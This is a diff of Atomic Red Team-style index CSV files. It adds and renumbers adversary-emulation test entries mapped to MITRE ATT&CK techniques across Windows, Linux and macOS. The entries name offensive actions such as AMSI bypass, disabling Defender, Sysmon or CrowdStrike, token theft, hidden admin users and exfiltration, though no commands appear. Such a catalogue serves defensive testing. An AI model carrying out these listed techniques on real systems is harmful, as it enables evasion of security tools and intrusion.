+discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
+discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
+discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
@@ -559,6 +583,7 @@ discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall R
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
 discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
+discovery,T1016,System Network Configuration Discovery,6,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
@@ -690,6 +715,7 @@ collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f05622
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
+collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -61,6 +61,8 @@ defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f1
 defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
 defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
+defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
+defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
 defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
 defense-evasion,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
@@ -84,6 +86,7 @@ defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666
 defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
+defense-evasion,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -118,7 +121,8 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy -
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
-discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps,ba62ce11-e820-485f-9c17-6f3c857cd840,sh
+discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
+discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
 discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
 discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -53,7 +53,8 @@ defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-
 defense-evasion,T1562.001,Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
 defense-evasion,T1562.001,Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
 defense-evasion,T1562.001,Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
-defense-evasion,T1562.001,Disable or Modify Tools,8,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
+defense-evasion,T1562.001,Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
+defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
@@ -64,7 +65,8 @@ defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb909
 defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
 defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
 defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
-defense-evasion,T1564.002,Hidden Users,1,Hidden Users,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
+defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
+defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
@@ -85,6 +87,7 @@ defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e
 defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
+defense-evasion,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -113,12 +116,14 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
-discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps,ba62ce11-e820-485f-9c17-6f3c857cd840,sh
+discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
 discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
+discovery,T1016,System Network Configuration Discovery,6,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -30,6 +30,7 @@ privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn
 privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
 privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
+privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -48,6 +49,8 @@ privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configurat
 privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
@@ -89,6 +92,7 @@ defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad+
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
+defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
@@ -96,21 +100,21 @@ defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP
 defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
 defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,9,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,10,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,11,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,13,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,14,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,15,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,16,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,17,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,18,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
-defense-evasion,T1562.001,Disable or Modify Tools,19,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,20,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,21,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
-defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
@@ -123,6 +127,7 @@ defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
+defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
 defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
 defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
 defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
@@ -133,6 +138,8 @@ defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/in
 defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
 defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks,58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
+defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
+defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -204,10 +211,13 @@ defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf
 defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
+defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
 defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
 defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
 defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
@@ -239,6 +249,8 @@ persistence,T1546.001,Change Default File Association,1,Change Default File Asso
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
+persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
@@ -246,7 +258,9 @@ persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-4
 persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
+persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
 persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
+persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
 persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
@@ -335,10 +349,11 @@ discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa
 discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
-discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
-discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
+discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
+discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
